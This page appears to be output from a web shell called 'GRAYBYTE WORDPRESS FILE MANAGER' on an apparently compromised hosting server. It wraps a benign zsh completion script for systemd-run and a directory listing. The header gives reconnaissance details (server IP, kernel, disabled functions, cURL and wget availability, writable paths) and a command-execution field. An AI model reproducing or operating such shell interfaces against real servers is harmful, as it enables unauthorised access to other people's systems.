GRAYBYTE WORDPRESS FILE MANAGER4023

Server IP : 198.54.121.189 / Your IP : 216.73.216.140
System : Linux premium69.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
PHP Version : 7.4.33
Disable Function : NONE
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF
Directory : /usr/share/zsh/site-functions/
Upload Files :
Current_dir [ Not Writeable ] Document_root [ Writeable ]

Command :


Current File : /usr/share/zsh/site-functions//_systemd-run
#compdef systemd-run
# SPDX-License-Identifier: LGPL-2.1+

__systemctl() {
        local -a _modes
        _modes=("--user" "--system")
        systemctl ${words:*_modes} --full --no-legend --no-pager "$@" 2>/dev/null
}

__get_slices () {
        __systemctl list-units --all -t slice \
        | { while read -r a b; do echo $a; done; };
}

__slices () {
        local -a _slices
        _slices=(${(fo)"$(__get_slices)"})
        typeset -U _slices
        _describe 'slices' _slices
}

_arguments \
        {-h,--help}'[Show help message]' \
        '--version[Show package version]' \
        '--user[Run as user unit]' \
        {-H+,--host=}'[Operate on remote host]:[user@]host:_sd_hosts_or_user_at_host' \
        {-M+,--machine=}'[Operate on local container]:machines:_sd_machines' \
        '--scope[Run this as scope rather than service]' \
        '--unit=[Run under the specified unit name]:unit name' \
        {-p+,--property=}'[Set unit property]:NAME=VALUE:(( \
                CPUAccounting= MemoryAccounting= BlockIOAccounting= SendSIGHUP= \
                SendSIGKILL= MemoryLimit= CPUShares= BlockIOWeight= User= Group= \
                DevicePolicy= KillMode= DeviceAllow= BlockIOReadBandwidth= \
                BlockIOWriteBandwidth= BlockIODeviceWeight= Nice= Environment= \
                KillSignal= LimitCPU= LimitFSIZE= LimitDATA= LimitSTACK= \
                LimitCORE= LimitRSS= LimitNOFILE= LimitAS= LimitNPROC= \
                LimitMEMLOCK= LimitLOCKS= LimitSIGPENDING= LimitMSGQUEUE= \
                LimitNICE= LimitRTPRIO= LimitRTTIME= PrivateTmp= PrivateDevices= \
                PrivateNetwork= NoNewPrivileges= WorkingDirectory= RootDirectory= \
                TTYPath= SyslogIdentifier= SyslogLevelPrefix= SyslogLevel= \
                SyslogFacility= TimerSlackNSec= OOMScoreAdjust= ReadWritePaths= \
                ReadOnlyPaths= InaccessiblePaths= EnvironmentFile= \
                ProtectSystem= ProtectHome= RuntimeDirectory= PassEnvironment= \
                ))' \
        '--description=[Description for unit]:description' \
        '--slice=[Run in the specified slice]:slices:__slices' \
        {-r,--remain-after-exit}'[Leave service around until explicitly stopped]' \
        '--send-sighup[Send SIGHUP when terminating]' \
        '--service-type=[Service type]:type:(simple forking oneshot dbus notify idle)' \
        '--uid=[Run as system user]:user:_users' \
        '--gid=[Run as system group]:group:_groups' \
        '--nice=[Nice level]:nice level' \
        '--setenv=[Set environment]:NAME=VALUE' \
        '--on-active=[Run after SEC seconds]:SEC' \
        '--on-boot=[Run SEC seconds after machine was booted up]:SEC' \
        '--on-startup=[Run SEC seconds after systemd was first started]:SEC' \
        '--on-unit-active=[Run SEC seconds after the last activation]:SEC' \
        '--on-unit-inactive=[Run SEC seconds after the last deactivation]:SEC' \
        '--on-calendar=[Realtime timer]:SPEC' \
        '--timer-property=[Set timer unit property]:NAME=VALUE' \
        '--wait=[Wait until service stopped again]' \
        '*::command:_command'

[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
March 06 2024 00:00:22
root / root
0755
_bootctl
1.075 KB
June 22 2018 11:11:49
root / root
0644
_busctl
2.985 KB
June 22 2018 11:11:49
root / root
0644
_coredumpctl
1.545 KB
June 22 2018 11:11:49
root / root
0644
_curl
13.016 KB
January 28 2025 01:43:09
root / root
0644
_firewalld
18.614 KB
March 11 2025 09:51:09
root / root
0644
_hostnamectl
2.217 KB
June 22 2018 11:11:49
root / root
0644
_journalctl
5.835 KB
June 22 2018 11:11:49
root / root
0644
_kernel-install
0.636 KB
June 22 2018 11:11:49
root / root
0644
_libinput
7.484 KB
November 03 2020 04:42:35
root / root
0644
_localectl
3.501 KB
June 22 2018 11:11:49
root / root
0644
_loginctl
5.668 KB
June 22 2018 11:11:49
root / root
0644
_parallel
0.117 KB
December 25 2024 00:17:11
root / root
0644
_sd_hosts_or_user_at_host
0.113 KB
June 22 2018 11:11:49
root / root
0644
_sd_machines
0.347 KB
June 22 2018 11:11:49
root / root
0644
_sd_outputmodes
0.282 KB
June 22 2018 11:11:49
root / root
0644
_sd_unit_files
0.249 KB
June 22 2018 11:11:49
root / root
0644
_systemctl
15.24 KB
April 22 2025 01:58:20
root / root
0644
_systemd
3.749 KB
June 22 2018 11:11:49
root / root
0644
_systemd-analyze
2.993 KB
June 22 2018 11:11:49
root / root
0644
_systemd-delta
0.551 KB
June 22 2018 11:11:49
root / root
0644
_systemd-inhibit
1.036 KB
June 22 2018 11:11:49
root / root
0644
_systemd-resolve
2.275 KB
June 22 2018 11:11:49
root / root
0644
_systemd-run
3.063 KB
June 22 2018 11:11:49
root / root
0644
_systemd-tmpfiles
0.719 KB
June 22 2018 11:11:49
root / root
0644
_timedatectl
1.994 KB
June 22 2018 11:11:49
root / root
0644
_udevadm
5.856 KB
June 22 2018 11:11:49
root / root
0644

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF